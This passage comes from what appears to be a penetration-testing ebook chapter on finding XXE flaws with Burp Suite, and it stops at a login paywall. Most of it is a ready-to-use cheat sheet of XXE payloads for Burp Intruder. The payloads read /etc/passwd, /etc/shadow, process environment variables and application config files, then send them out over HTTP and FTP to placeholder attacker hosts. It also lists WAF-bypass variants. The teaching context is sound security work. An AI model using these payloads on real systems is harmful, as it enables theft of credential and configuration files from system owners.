Detecting XML-related issues, such as XXE

The XML issues need that the request accepts XML, so we need this information in the header's content-type, as follows:

text/xml
application/xml

We can configure a filter in Burp Suite to detect requests that have this information in the headers. To configure the filter, go to the Target tool, and then click on the Filter bar. Once there, select the XML file format, and if you want, write the content-type string that we know all requests need to have, as shown in the following screenshot:

After filtering the request that could be vulnerable, add common testing strings as a payload list in the Intruder tools, as with the past vulnerabilities, and launch them to all the potential requests. For example, one of the most common strings to detect XXE is the following:

<!ENTITY % three SYSTEM "file:///etc/passwd">

When the file appears in the response, it means that you have detected a vulnerability. I recommend the use of the next cheat sheet created by Etienne Stalmans, as a payload list in Intruder, as follows:

-------------------------------------------------------------- 
Vanilla, used to verify outbound xxe or blind xxe 
-------------------------------------------------------------- 
 
<?xml version="1.0" ?> 
<!DOCTYPE r [ 
<!ELEMENT r ANY > 
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> 
]> 
<r>&sp;</r> 
 
--------------------------------------------------------------- 
OoB extraction 
--------------------------------------------------------------- 
 
<?xml version="1.0" ?> 
<!DOCTYPE r [ 
<!ELEMENT r ANY > 
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml"> 
%sp; 
%param1; 
]> 
<r>&exfil;</r> 
 
## External dtd: ## 
 
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini"> 
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://x.x.x.x:443/?%data;'>"> 
 
---------------------------------------------------------------- 
OoB variation of above (seems to work better against .NET) 
---------------------------------------------------------------- 
<?xml version="1.0" ?> 
<!DOCTYPE r [ 
<!ELEMENT r ANY > 
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml"> 
%sp; 
%param1; 
%exfil; 
]> 
 
## External dtd: ## 
 
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini"> 
<!ENTITY % param1 "<!ENTITY % exfil SYSTEM 'http://x.x.x.x:443/?%data;'>"> 
 
--------------------------------------------------------------- 
OoB extraction 
--------------------------------------------------------------- 
 
<?xml version="1.0"?> 
<!DOCTYPE r [ 
<!ENTITY % data3 SYSTEM "file:///etc/shadow"> 
<!ENTITY % sp SYSTEM "http://EvilHost:port/sp.dtd"> 
%sp; 
%param3; 
%exfil; 
]> 
 
## External dtd: ## 
<!ENTITY % param3 "<!ENTITY % exfil SYSTEM 'ftp://Evilhost:port/%data3;'>"> 
 
----------------------------------------------------------------------- 
OoB extra ERROR -- Java 
----------------------------------------------------------------------- 
<?xml version="1.0"?> 
<!DOCTYPE r [ 
<!ENTITY % data3 SYSTEM "file:///etc/passwd"> 
<!ENTITY % sp SYSTEM "http://x.x.x.x:8080/ss5.dtd"> 
%sp; 
%param3; 
%exfil; 
]> 
<r></r> 
## External dtd: ## 
 
<!ENTITY % param1 '<!ENTITY % external SYSTEM "file:///nothere/%payload;">'> %param1; %external; 
 
 
----------------------------------------------------------------------- 
OoB extra nice 
----------------------------------------------------------------------- 
 
<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE root [ 
 <!ENTITY % start "<![CDATA["> 
 <!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml "> 
<!ENTITY % end "]]>"> 
<!ENTITY % dtd SYSTEM "http://evil/evil.xml"> 
%dtd; 
]> 
<root>&all;</root> 
  
## External dtd: ## 
  
<!ENTITY all "%start;%stuff;%end;"> 
 
------------------------------------------------------------------ 
File-not-found exception based extraction 
------------------------------------------------------------------ 
 
<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE test [   
  <!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" > 
  %one; 
  %two; 
  %four; 
]> 
 
## External dtd: ## 
 
<!ENTITY % three SYSTEM "file:///etc/passwd"> 
<!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>"> 
 
-------------------------^ you might need to encode this % (depends on your target) as: % 
 
-------------- 
FTP 
-------------- 
<?xml version="1.0" ?> 
<!DOCTYPE a [  
<!ENTITY % asd SYSTEM "http://x.x.x.x:4444/ext.dtd"> 
%asd; 
%c; 
]> 
<a>&rrr;</a> 
 
 
## External dtd ## 
<!ENTITY % d SYSTEM "file:///proc/self/environ"> 
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>"> 
 
--------------------------- 
Inside SOAP body 
--------------------------- 
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body> 
 
 
--------------------------- 
Untested - WAF Bypass 
--------------------------- 
<!DOCTYPE :. SYTEM "http://" 
<!DOCTYPE :_-_: SYTEM "http://" 
<!DOCTYPE {0xdfbf} SYSTEM "http://"

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset